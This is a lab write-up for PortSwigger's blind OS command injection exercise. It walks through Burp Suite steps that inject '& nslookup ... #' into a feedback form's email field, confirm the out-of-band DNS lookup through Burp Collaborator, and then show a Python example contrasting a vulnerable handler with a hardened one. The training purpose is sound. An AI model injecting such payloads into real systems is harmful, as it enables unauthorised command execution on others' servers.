Lab 4 - Blind OS Command Injection with Out-of-Band Interaction
Lab 4: Setup
Burp Suite Startup
- Open up Burp Suite by clicking on the Kali Linux icon in the upper left corner to expand the menu.
- Type "Burp Suite" into the search bar.
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite has finished loading, click on "Proxy".
- Click on "Open browser".
Navigate to the Command Injection Labs on PortSwigger in the Burp Suite Browser
- Log in to the [PortSwigger](https://portswigger.net/) website.
- Click on the three-line menu under "MY ACCOUNT" on the PortSwigger website. Then, click on "Academy".
- Click on the expand button. Then, click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band interaction".
- Click on "ACCESS THE LAB".
Lab Description:
This lab features a blind OS command injection vulnerability within the feedback function.
The application runs a user-supplied shell command in an asynchronous manner, without affecting its response. While it's impossible to redirect output to an accessible location, you can initiate out-of-band interactions with an external domain.
To complete the lab, exploit the blind OS command injection to perform a DNS lookup using Burp Collaborator.
Lab Solution
The target goal: Exploit blind OS command injection to issue a DNS lookup to Burp Collaborator.
Analysis: "& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #".
- It is not possible to redirect output into a location that you can access.
- Navigate to Burp Suite and turn Intercept on by clicking on "Intercept is off".
- Navigate to the Burp browser and click on "Submit feedback".
- Navigate back to Burp Suite and turn Intercept off by clicking on "Intercept is on".
- Navigate back to the Burp browser and fill in the "Submit feedback" form:
- Name: "test".
- Email: "test@test.ca".
- Subject: "test".
- Message: "test".
- Click on "Submit feedback".
- Notice that a POST request to "feedback/submit" has appeared in the "HTTP history" tab in Burp Suite.
- Click on the POST request. Right-click on the request in the bottom pane and select "Send to Repeater".
- Click on "Send" to confirm the request still works.
- Click on "Burp" in the upper left corner. Then, "Burp Collaborator Client".
- Click on "Copy to clipboard" in the pop-up window.
- "zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net" is the external server that we control.
- We will try to perform a DNS lookup to that server to confirm that the feedback function is vulnerable to blind command injection.
- Add "&" to chain a second command. Then use the "nslookup" command on the Collaborator domain. At the end, put a "#" so that the rest of the original command is treated as a comment.
- The command will be: "& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #".
- Put the command into the email parameter, which is the one vulnerable to blind command injection.
- The request body turns into: "csrf=FhT12DC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email=test%40test.ca & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #&subject=test&message=test".
- Highlight "& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #" and press "Ctrl + U" to URL-encode it.
- The request body turns into: "csrf=FhT1ZDC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email=test%40test.ca+%26+nslookup+zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net+%23&subject=test&message=test".
- Click on "Send".
- Navigate to the "Burp Collaborator Client".
- Click on "Poll Now".
- Two DNS lookups of our domain were received. This means the feedback function is vulnerable to blind command injection.
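To show why the "& nslookup ... #" value in the email parameter works and what the fix looks like, here is an added Python example (not part of this write-up or of the PortSwigger lab's code): it decodes a constructed form body shaped like the URL-encoded one above, tokenises the resulting command line the way a POSIX shell would, and contrasts a hypothetical vulnerable feedback handler with a hardened one. The "mail -s Feedback" command, the csrf token and the Collaborator subdomain are assumed placeholders.

```python
import re
import shlex
from urllib.parse import parse_qs

# Constructed request body modelled on the URL-encoded one in the write-up;
# the csrf token and Collaborator subdomain are placeholders, not real values.
BODY = ("csrf=PLACEHOLDER_TOKEN&name=test"
        "&email=test%40test.ca+%26+nslookup+PLACEHOLDER.burpcollaborator.net+%23"
        "&subject=test&message=test")


def email_from_body(body: str) -> str:
    """Decode the form body as the server does: '+' -> ' ', %26 -> '&', %23 -> '#'."""
    return parse_qs(body)["email"][0]


def vulnerable_command(email: str) -> str:
    """VULNERABLE pattern: a hypothetical handler splices the email into a
    command string that it would hand to the shell (shell=True)."""
    return f"mail -s Feedback {email}"


def shell_tokens(cmd: str) -> list:
    """Tokenise like a POSIX shell: '&' is an operator, '#' starts a comment."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def injected_commands(cmd: str) -> list:
    """List the separate commands the shell would run, split on & ; | operators."""
    commands, current = [], []
    for tok in shell_tokens(cmd):
        if tok in ("&", "&&", ";", "|", "||"):
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def safe_argv(email: str) -> list:
    """HARDENED pattern: allowlist-validate the value, then pass it as a single
    argv element (subprocess.run(argv) with no shell) so metacharacters are inert."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected email value")
    return ["mail", "-s", "Feedback", email]
```

With the vulnerable handler the decoded value splits into two commands, the second being the nslookup that produces the Collaborator DNS interaction; with the hardened handler the same value is rejected before any command is built.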
Disclaimer: This lab needs the Burp Suite Professional version, which I don't have, so part of the lab is from this video: https://www.youtube.com/watch?v=GUT03VBj7Vc